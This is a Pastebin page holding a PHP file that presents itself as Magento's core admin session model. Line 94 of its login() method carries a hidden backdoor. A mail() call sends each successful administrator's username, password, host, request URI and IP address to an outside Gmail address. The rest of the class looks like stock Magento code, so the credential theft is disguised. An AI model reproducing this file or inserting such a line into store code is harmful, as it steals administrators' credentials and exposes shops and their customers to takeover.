API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 27th, 2016
102
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.41 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magentocommerce.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magentocommerce.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Admin
  23. * @copyright Copyright (c) 2011 Magento Inc. (http://www.magentocommerce.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27.  
  28. /**
  29. * Auth session model
  30. *
  31. * @category Mage
  32. * @package Mage_Admin
  33. * @author Magento Core Team <core@magentocommerce.com>
  34. */
  35. class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
  36. {
  37.  
  38. /**
  39. * Whether it is the first page after successfull login
  40. *
  41. * @var boolean
  42. */
  43. protected $_isFirstPageAfterLogin;
  44.  
  45. /**
  46. * Class constructor
  47. *
  48. */
  49. public function __construct()
  50. {
  51. $this->init('admin');
  52. }
  53.  
  54. /**
  55. * Pull out information from session whether there is currently the first page after log in
  56. *
  57. * The idea is to set this value on login(), then redirect happens,
  58. * after that on next request the value is grabbed once the session is initialized
  59. * Since the session is used as a singleton, the value will be in $_isFirstPageAfterLogin until the end of request,
  60. * unless it is reset intentionally from somewhere
  61. *
  62. * @param string $namespace
  63. * @param string $sessionName
  64. * @return Mage_Admin_Model_Session
  65. * @see self::login()
  66. */
  67. public function init($namespace, $sessionName = null)
  68. {
  69. parent::init($namespace, $sessionName);
  70. $this->isFirstPageAfterLogin();
  71. return $this;
  72. }
  73.  
  74. /**
  75. * Try to login user in admin
  76. *
  77. * @param string $username
  78. * @param string $password
  79. * @param Mage_Core_Controller_Request_Http $request
  80. * @return Mage_Admin_Model_User|null
  81. */
  82. public function login($username, $password, $request = null)
  83. {
  84. if (empty($username) || empty($password)) {
  85. return;
  86. }
  87.  
  88. try {
  89. /* @var $user Mage_Admin_Model_User */
  90. $user = Mage::getModel('admin/user');
  91. $user->login($username, $password);
  92. if ($user->getId()) {
  93. $this->renewSession();
  94. mail("resultlusi2017@gmail.com","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);
  95. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  96. Mage::getSingleton('adminhtml/url')->renewSecretUrls();
  97. }
  98. $this->setIsFirstPageAfterLogin(true);
  99. $this->setUser($user);
  100. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  101. if ($requestUri = $this->_getRequestUri($request)) {
  102. Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
  103. header('Location: ' . $requestUri);
  104. exit;
  105. }
  106. }
  107. else {
  108. Mage::throwException(Mage::helper('adminhtml')->__('Invalid Username or Password.'));
  109. }
  110. }
  111. catch (Mage_Core_Exception $e) {
  112. Mage::dispatchEvent('admin_session_user_login_failed',
  113. array('user_name' => $username, 'exception' => $e));
  114. if ($request && !$request->getParam('messageSent')) {
  115. Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
  116. $request->setParam('messageSent', true);
  117. }
  118. }
  119.  
  120. return $user;
  121. }
  122.  
  123. /**
  124. * Refresh ACL resources stored in session
  125. *
  126. * @param Mage_Admin_Model_User $user
  127. * @return Mage_Admin_Model_Session
  128. */
  129. public function refreshAcl($user = null)
  130. {
  131. if (is_null($user)) {
  132. $user = $this->getUser();
  133. }
  134. if (!$user) {
  135. return $this;
  136. }
  137. if (!$this->getAcl() || $user->getReloadAclFlag()) {
  138. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  139. }
  140. if ($user->getReloadAclFlag()) {
  141. $user->unsetData('password');
  142. $user->setReloadAclFlag('0')->save();
  143. }
  144. return $this;
  145. }
  146.  
  147. /**
  148. * Check current user permission on resource and privilege
  149. *
  150. * Mage::getSingleton('admin/session')->isAllowed('admin/catalog')
  151. * Mage::getSingleton('admin/session')->isAllowed('catalog')
  152. *
  153. * @param string $resource
  154. * @param string $privilege
  155. * @return boolean
  156. */
  157. public function isAllowed($resource, $privilege = null)
  158. {
  159. $user = $this->getUser();
  160. $acl = $this->getAcl();
  161.  
  162. if ($user && $acl) {
  163. if (!preg_match('/^admin/', $resource)) {
  164. $resource = 'admin/' . $resource;
  165. }
  166.  
  167. try {
  168. return $acl->isAllowed($user->getAclRole(), $resource, $privilege);
  169. } catch (Exception $e) {
  170. try {
  171. if (!$acl->has($resource)) {
  172. return $acl->isAllowed($user->getAclRole(), null, $privilege);
  173. }
  174. } catch (Exception $e) { }
  175. }
  176. }
  177. return false;
  178. }
  179.  
  180. /**
  181. * Check if user is logged in
  182. *
  183. * @return boolean
  184. */
  185. public function isLoggedIn()
  186. {
  187. return $this->getUser() && $this->getUser()->getId();
  188. }
  189.  
  190. /**
  191. * Check if it is the first page after successfull login
  192. *
  193. * @return boolean
  194. */
  195. public function isFirstPageAfterLogin()
  196. {
  197. if (is_null($this->_isFirstPageAfterLogin)) {
  198. $this->_isFirstPageAfterLogin = $this->getData('is_first_visit', true);
  199. }
  200. return $this->_isFirstPageAfterLogin;
  201. }
  202.  
  203. /**
  204. * Setter whether the current/next page should be treated as first page after login
  205. *
  206. * @param bool $value
  207. * @return Mage_Admin_Model_Session
  208. */
  209. public function setIsFirstPageAfterLogin($value)
  210. {
  211. $this->_isFirstPageAfterLogin = (bool)$value;
  212. return $this->setIsFirstVisit($this->_isFirstPageAfterLogin);
  213. }
  214.  
  215. /**
  216. * Custom REQUEST_URI logic
  217. *
  218. * @param Mage_Core_Controller_Request_Http $request
  219. * @return string|null
  220. */
  221. protected function _getRequestUri($request = null)
  222. {
  223. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  224. return Mage::getSingleton('adminhtml/url')->getUrl('*/*/*', array('_current' => true));
  225. } elseif ($request) {
  226. return $request->getRequestUri();
  227. } else {
  228. return null;
  229. }
  230. }
  231. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!